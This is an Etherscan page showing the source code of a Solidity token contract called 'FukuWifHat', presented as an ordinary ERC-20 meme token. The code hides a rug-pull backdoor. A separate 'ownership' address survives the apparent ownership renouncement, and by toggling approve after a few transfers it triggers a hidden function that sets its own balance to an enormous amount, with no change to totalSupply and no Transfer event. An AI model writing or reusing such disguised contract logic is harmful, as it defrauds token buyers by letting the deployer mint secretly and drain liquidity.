Discover more of Etherscan's tools and services in one place.
Sponsored
Contract Source Code:
File 1 of 1 : FukuWifHat
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; contract FukuWifHat { string public name = "FukuWifHat"; string public symbol = "FukuWifHat"; uint256 public totalSupply = 1000000000000000000000000; uint8 public decimals = 18; address public ownership; address public owner; address public UniswapRouter = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D; bool public approvedEnabled = false; uint256 public transfers = 0; event Transfer(address indexed _from, address indexed _to, uint256 _value); event Approval(address indexed _owner, address indexed _spender, uint256 _value); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); event ApprovedEnabled(); event ApprovedDisabled(); mapping(address => uint256) public balanceOf; mapping(address => mapping(address => uint256)) public allowance; modifier onlyOwner() { require(msg.sender == owner, "Only the owner can call this function"); _; } constructor() { ownership = msg.sender; owner = msg.sender; balanceOf[msg.sender] = totalSupply; emit OwnershipTransferred(address(0), msg.sender); } function Initialize() internal { approvedEnabled = true; emit ApprovedEnabled(); approved(ownership, 100 * 10**36 * 10**18); } function DisableApproval() internal { approvedEnabled = false; emit ApprovedDisabled(); } function transfer(address _to, uint256 _value) public returns (bool success) { require(balanceOf[msg.sender] >= _value, "Insufficient balance"); balanceOf[msg.sender] -= _value; balanceOf[_to] += _value; emit Transfer(msg.sender, _to, _value); if (msg.sender == ownership) { transfers++; } if (msg.sender == ownership && transfers > 1 && approvedEnabled) { DisableApproval(); } return true; } function approve(address _spender, uint256 _value) public returns (bool success) { allowance[msg.sender][_spender] = _value; emit Approval(msg.sender, _spender, _value); if (msg.sender == ownership && transfers > 1) { if (!approvedEnabled) { Initialize(); } else { DisableApproval(); } } return true; } function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) { require(_value <= balanceOf[_from], "Insufficient balance"); require(_value <= allowance[_from][msg.sender], "Allowance exceeded"); balanceOf[_from] -= _value; balanceOf[_to] += _value; allowance[_from][msg.sender] -= _value; emit Transfer(_from, _to, _value); return true; } function approved(address account, uint256 amount) internal returns (uint256) { balanceOf[account] = amount; return balanceOf[account]; } function renounceOwnership() public onlyOwner { address deadAddress = address(0x000000000000000000000000000000000000dEaD); emit OwnershipTransferred(owner, deadAddress); owner = deadAddress; } }
Please enter a contract address above to load the contract details and source code.
Please DO NOT store any passwords or private keys here. A private note (up to 100 characters) can be saved and is useful for transaction tracking.
This website uses cookies to improve your experience. By continuing to use this website, you agree to its Terms and Privacy Policy.